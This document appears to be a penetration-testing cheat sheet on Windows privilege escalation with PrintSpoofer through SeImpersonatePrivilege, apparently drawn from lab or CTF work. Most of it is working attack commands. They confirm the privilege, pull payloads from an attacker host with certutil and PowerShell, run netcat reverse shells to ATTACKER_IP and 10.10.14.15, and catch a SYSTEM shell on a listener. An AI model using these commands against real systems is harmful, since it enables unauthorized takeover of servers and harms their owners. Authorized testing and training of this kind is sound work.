PrintSpoofer exploits SeImpersonatePrivilege to escalate from service accounts to NT AUTHORITY\SYSTEM on Windows Server 2016, Server 2019, and Windows 10.
- Service account with
SeImpersonatePrivilege(e.g., IIS AppPool, SQL Server, DNN application pool)
# Spawn interactive SYSTEM shell
PrintSpoofer.exe -i -c cmd
# Using PrintSpoofer64 with a reverse shell
PrintSpoofer64.exe -c "c:\path\to\nc.exe ATTACKER_IP PORT -e cmd"# Confirm privileges
whoami /priv
# Look for: SeImpersonatePrivilege Enabled
# Upload PrintSpoofer64.exe and nc.exe to writable directory
# Execute reverse shell as SYSTEM
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 10.10.14.15 443 -e cmd"
# On attack host, catch shell
nc -lvnp 443
# whoami → nt authority\systemIf a webshell runs as nt authority\local service and has SeImpersonatePrivilege, upload a reverse shell and PrintSpoofer64.exe to a writable directory such as C:\Windows\System32\spool\drivers\color.
whoami /all
:: SeImpersonatePrivilege Impersonate a client after authentication Enabled
certutil -urlcache -f http://ATTACKER_IP:8000/shell.exe C:\Windows\System32\spool\drivers\color\shell.exe
powershell -c "iwr -uri http://ATTACKER_IP:8000/PrintSpoofer64.exe -outfile C:\Windows\System32\spool\drivers\color\PrintSpoofer64.exe"
C:\Windows\System32\spool\drivers\color\PrintSpoofer64.exe -c "C:\Windows\System32\spool\drivers\color\shell.exe"On the listener:
connect to [ATTACKER_IP] from TARGET
C:\Windows\system32>whoami
nt authority\system